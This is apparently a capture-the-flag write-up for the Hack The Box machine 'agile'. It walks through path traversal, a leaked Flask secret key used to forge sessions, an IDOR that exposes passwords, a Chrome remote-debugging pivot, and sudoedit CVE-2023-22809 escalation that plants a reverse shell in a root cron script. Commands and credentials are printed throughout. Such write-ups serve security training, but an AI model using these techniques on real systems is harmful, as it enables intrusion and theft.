IP-ADDR: superpass.htb
nmap scan: TCP/IP
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)
|_ 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Web server is redirecting to
- Web server is running python flask application(?)
- Debug mode is enabled in the web application, application is returning detailed trace back error when something unexpected data inputs.
- App is Using "jinja" template engine.
gobuster found a /download
❯ gobuster dir -w ~/git-tools/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u "http://superpass.htb" -t 100
... [snip] ...
/download (Status: 302) [Size: 249] [--> /account/login?next=%2Fdownload]
/static (Status: 301) [Size: 178] [--> http://superpass.htb/static/]
/vault (Status: 302) [Size: 243] [--> /account/login?next=%2Fvault]
But it return traceback error which looks interesting
Register an account, login to the valut and Add a password in the "vault" after clicking on export it redirect to /download?fn=test_export_34e63cbfb4.csv
and download stored passwords in a CSV file.
And from the above /download
error, looks like we are in the /tmp
we can escape tmp
directory using LFI in fn
And application directory leaked from the debug errors - /app/app/superpass/
So we can leak the app.py
source code.
And from the app.py
, got the flask SECRET_KEY.
app.config['SECRET_KEY'] = 'MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD'
Valut source code found here - /app/app/superpass/views/vault_views.py
With the SECRET_KEY we can use flask-unsign
to decode and sign new session token.
❯ flask-unsign -d -c ".eJwljsFqwzAQRH9F7DkUSSvvav0VvZcQ1tIqNrhNsZxTyL9X0NMwvGF4L7i1XftqHeavF7hzBHxb73o3uMDnbtrN7Y-7237c-XBayoDuXLfufsfmA67v62WcHNZXmM_jaaNtFWZgREP0ylbEKpmmmBDFB2mMlLilFiMGqSoyaONMOUSORSPpotWYCqsoikplzySpUsuNfJTiU8rRQuZlqpITYdaJsHGYfKS6SBEa-rdnt-PfRuD9B50hRQ4.ZARHiA.dymzbGkU0yxJeHDHknKkGcDd5t8" --secret MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD
{'_flashes': [('message', 'Please log in to access this page.')], '_fresh': True, '_id': '733e330a7ec9ed6ea424339019f73647f4f22319da996eaf78681272ca26abade76c7a9a39a9d707694d6f8f6029c04482e187b5d984638a563f715026db9c96', '_user_id': '9'}
And we can sign new session token with the secret
❯ flask-unsign -s -c "{'_flashes': [('message', 'Please log in to access this page.')], '_fresh': True, '_id': '733e330a7ec9ed6ea424339019f73647f4f22319da996eaf78681272ca26abade76c7a9a39a9d707694d6f8f6029c04482e187b5d984638a563f715026db9c96', '_user_id': '1'}" --secret MNOHFl8C4WLc3DQTToeeg8ZT7WpADVhqHHXJ50bPZY6ybYKEr76jNvDfsWD
While changing the "_user_id
" to 8
we can the password for site agile
- corum:5db7caa1d13cc37c9fc2
And we can reuse them to ssh in the box.
Back to vault dashboard, when we add password and after adding it. if we click on edit button, a request send to the server /vault/edit_row/<ID>
And the application is not properly check the session and we can leak any user's password using IDOR.
Which leaked the ssh creds - corum:5db7caa1d13cc37c9fc2
from ID - 8
Got ssh as user "corum" and there are few more users in the box.
corum@agile:~$ cat /etc/passwd | grep -E *sh$
Running linpeas in the background
wget --no-check-certificate https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
ssh [email protected] bash < linpeas.sh
A cron is executing /bin/bash /app/test_and_update.sh
as user "runner" which script which is running /usr/bin/google-chrome
with remote debugging enabled on port "41829".
This script is running test application from /app/app-testing
In the /app/app-testing/tests/functional
directory, there is a creds.txt
file and a test_site_interactively.py
script which automate wep app features.
corum@agile:/app/app-testing/tests/functional$ ls -l
total 12
drwxrwxr-x 2 runner runner 4096 Mar 5 09:15 __pycache__
-rw-r----- 1 dev_admin runner 34 Mar 5 09:18 creds.txt
-rw-r--r-- 1 runner runner 2663 Mar 5 09:18 test_site_interactively.py
Test application is running on hostname test.superpass.htb
And it we see the nginx sites config, test.superpass.htb
only accessible from localhost.
corum@agile:/etc/nginx/sites-enabled$ cat /etc/nginx/sites-available/superpass-test.nginx
server {
server_name test.superpass.htb;
location /static {
alias /app/app-testing/superpass/static;
expires 365d;
location / {
include uwsgi_params;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Protocol $scheme;
- This app is running on port 5555
- and also the "superpass" app source is same and their SECRET_KEY is also same (
) so we can sign a token and use same IDOR from above to find that user's passwords who is logging in using creds stored in thecreds.txt
curl -b "session=.eJwljsFqwzAQRH9F7DkUSSvvav0VvZcQ1tIqNrhNsZxTyL9X0NMwvGF4L7i1XftqHeavF7hzBHxb73o3uMDnbtrN7Y-7237c-XBayoDuXLfufsfmA67v62WcHNZXmM_jaaNtFWZgREP0ylbEKpmmmBDFB2mMlLilFiMGqSoyaONMOUSORSPpotWYCqsoikplzySpUsuNfJTiU8rRQuZlqpITYdaJsHGYfKS6SBEa-rdnt-PfJsD7D50JRQY.ZARgKg.D7KY3_1sR6Ts2BGJmcL2SSrOmsE"
Creating ssh tunnel to redirect debugger port to our machine.
ssh -L 41829:localhost:41829 [email protected]
Add the target in the chrome browser from chrome://inspect/#devices
using "Discover network targets" option.
And when it appear in the remote target list, open http://test.superpass.htb/vault
and clicking on the inspect, you can see the vault dashboard.
Got the ssh creds for user "edwards" - edwards:d07867c6267dcb5df0af
user "edwards" has some sudo rights and can run sudoedit
on file /app/config_test.json
as user "dev_admin"
edwards@agile:~$ sudo -l
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
(dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
This /app/config_test.json
config file contains mysql creds - superpasstester:VUO8A2c2#3FnLq3*a9DX1U
sudo -u dev_admin sudoedit /app/config_test.json
But these creds doesn't help and after some ramblling, i found a CVE CVE-2023-22809 in sudo versions: 1.8.0 to 1.9.12p1
In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.
and running sudo version is
edwards@agile:/dev/shm$ sudo -V
Sudo version 1.9.9
So we can edit any file that owned by user "dev_admin".
Finding everything that owned by "dev_admin"
edwards@agile:~$ find / -user dev_admin 2>/dev/null
edwards@agile:~$ find / -group dev_admin 2>/dev/null
and pspy catch a event where a cron is executing /app/venv/bin/activate
as root.
So we can add reverse shell in the /app/venv/bin/activate
bash script. and cron will execute this as root.
export EDITOR="vim -- /app/venv/bin/activate"
sudo -u dev_admin sudoedit /app/config_test.json